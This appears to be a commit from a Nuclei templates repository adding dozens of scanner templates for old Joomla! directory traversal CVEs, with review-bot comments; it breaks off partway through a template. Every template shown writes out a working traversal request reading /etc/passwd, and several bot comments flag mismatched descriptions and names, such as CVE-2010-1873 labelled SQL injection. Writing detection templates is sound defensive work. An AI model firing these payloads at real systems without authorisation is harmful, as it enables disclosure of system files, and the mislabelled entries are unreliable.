Nuclei 8.6.6

main
daffainfo 2021-11-10 05:49:13 +07:00
parent 3a091d3477
commit 4faf4dc1d6
110 changed files with 3076 additions and 13 deletions

27
CVE-2007-4504.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
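Review bot: `severity: high` is set here with no `classification` block, and the same holds for every other template visible in this commit except CVE-2010-0467.yaml, which carries `cvss-metrics`, `cvss-score`, `cve-id` and `cwe-id`. For consistent triage and filtering, add at least `classification:` with `cve-id: CVE-2007-4504` and `cwe-id: CWE-22` under `info`. The severity should come from the published CVSS score rather than a blanket value.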

27
CVE-2008-6080.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2008-6222.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-1496.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
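Review bot: The matcher on `root:.*:0:0` expects the contents of /etc/passwd in the response body, but the `description` says this flaw lets an attacker list arbitrary directories, not read files. If the component only returns directory listings, the template will never fire on a vulnerable host. Confirm the response shape against the referenced advisory and adjust the matcher if needed. CVE-2009-3318.yaml has the same tension, since its description speaks of accessing arbitrary directories.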

27
CVE-2009-2015.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-2100.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-3053.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-3318.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-4202.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
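Review bot: The `path` entry ends at `/etc/passwd` with no `%00` terminator, while most sibling templates in this commit that probe the same `controller` parameter append one. The description says the value is used to include and execute a local file. If the component appends a file extension before including (not visible here), this request would miss vulnerable installs and give a false negative. Check the referenced PoC and align the path; the same applies to CVE-2009-4679.yaml, CVE-2010-0157.yaml and CVE-2010-0982.yaml.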

27
CVE-2009-4679.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
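Review bot: `reference: |` turns the two URLs into one literal string that still contains the `- ` list markers, whereas the other templates give `reference:` as a YAML sequence; drop the `|` so the two items parse as a list. The same block-scalar form appears in CVE-2010-0467, CVE-2010-1461, CVE-2010-1469, CVE-2010-1478, CVE-2010-1540, CVE-2010-2050, CVE-2010-2128 and CVE-2010-2507. Separately, the request probes `option=com_kif_nexus` while the description names the component `com_if_nexus`. The `name` also says Remote File Inclusion although the description and the `lfi` tag describe a local include. Confirm which spelling the reference uses and make the three agree.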

27
CVE-2010-0157.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2010-0467.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0696.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
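Review bot: The request in `path` uses plain `../` sequences, but the `description` says the flaw is reached through a modified `./../.../` sequence. If the plugin filters ordinary dot-dot segments (which the CVE wording hints at but the page does not show), this probe will report vulnerable hosts as clean. Verify the sequence against the referenced PoC and add a short comment above `path` recording why the chosen form is sufficient.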

27
CVE-2010-0759.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0942.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0972.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0982.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1056.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1081.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1217.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1302.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1315.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1340.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1461.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1469.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1478.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1491.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1491
info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1540.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
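Review bot: The `name` field says `com_blog`, but both the description and the request target `com_myblog`; it should read `name: Joomla! Component com_myblog - Directory Traversal` so that searches by component name find this template. The description also gives the product as MyBlog 3.0.329, which the title omits while most sibling titles carry a version.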

27
CVE-2010-1603.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1603
info:
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1653.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1658.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1715.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1858.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1858
info:
name: Joomla! Component SMEStorage - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11853
- https://www.cvedetails.com/cve/CVE-2010-1858
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1873.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1873
info:
name: Joomla! Component Jvehicles - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
reference:
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
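Review bot: The `description` is for an SQL injection through the `aid` parameter in an `agentlisting` action, but the request and matcher test path traversal through `controller`, and the `name` and `lfi` tag say Local File Inclusion. A hit would therefore be reported under `id: CVE-2010-1873` for a flaw that the quoted CVE text does not describe. Either replace the description with one that matches the file-inclusion issue from the Exploit-DB reference and confirm the CVE assignment, or move the check to a non-CVE template id.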

27
CVE-2010-1878.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1878
info:
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1977.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1977
info:
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
CVE-2010-1982.yaml Normal file

@ -0,0 +1,26 @@
id: CVE-2010-1982
info:
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2045.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2045
info:
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
